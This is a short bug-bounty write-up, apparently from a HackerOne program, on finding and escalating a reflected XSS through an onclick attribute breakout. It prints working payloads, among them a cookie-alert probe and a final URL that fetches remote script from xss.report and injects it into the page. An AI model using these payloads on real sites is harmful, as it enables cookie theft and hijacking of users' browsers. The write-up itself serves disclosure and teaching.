.png)
3 hours ago
6 BOOK THIS SPACE FOR AD
ARTICLE ADHello everyone, I will share how I found reflected XSS in a HackerOne program.
First, I discovered a page with an input field. I attempted a simple XSS payload like this:
<img src onerror=alert(1)>Initially, this resulted in a self-XSS. I returned to the input field to find a way to make it a reflected XSS. I tried typing random words, but there were no parameters or anything visible in the URL.
Next, I attempted command injection by typing ls. Surprisingly, it navigated to a different page.
This indicated that a parameter was present in the URL. I tested further by inputting <test11>, but it showed that the < and > tags were not allowed.
Then, I tried using double quotes (“) instead. The input was reflected as is, along with a “Go back to Search” button. At this point, I focused on exploiting event handlers like onclick, onmouseup, and onmouseover.
I crafted this payload:
"onclick="alert(document.cookie)When I clicked the “Go back to Search” button, the XSS executed successfully. However, after clicking “OK” on the alert, the page redirected to the homepage.
To escalate the exploit, I attempted to inject a payload to steal cookies by using https://xss.report/ URL
first I try this payload
encoded version:
https://target.com/cwt.cfm?c=2650F80B&dttype=5%22%20onclick=%22fetch(%27https%3A%2F%2Fxss.report%2Fc%2Fusername%27).then(response%20=%3E%20response.text()).then(text%20=%3E%20{%20var%20script%20=%20document.createElement(%27script%27);%20script.innerHTML%20=%20text;%20document.body.appendChild(script);%20});decoded version:
https://target.com/cwtt.cfm?c=2650F80B&dttype=5"onclick="fetch('https://xss.report/c/username').then(response=>response.text()).then(text=>{varscript=document.createElement('script');script.innerHTML=text;document.body.appendChild(script);});The problem was that clicking the “Go back to Search” button caused a redirect to the homepage before the XSS could execute. To prevent the redirect, I added return false; to the end of the payload. The final payload looked like this:
https://target.com/cwtt.cfm?c=2650F80B&dttype=5"onclick="fetch('https://xss.report/c/username').then(response=>response.text()).then(text=>{varscript=document.createElement('script');script.innerHTML=text;document.body.appendChild(script);});returnfalse;Now, when the victim clicked the button, the XSS executed without redirecting them.
Extra Tip: Sometimes, you need to URL-encode the xss.report URL for the payload to work properly.
and this is all, I hope you learned something new from this write-up!
Bengali (Bangladesh) · 
English (United States) ·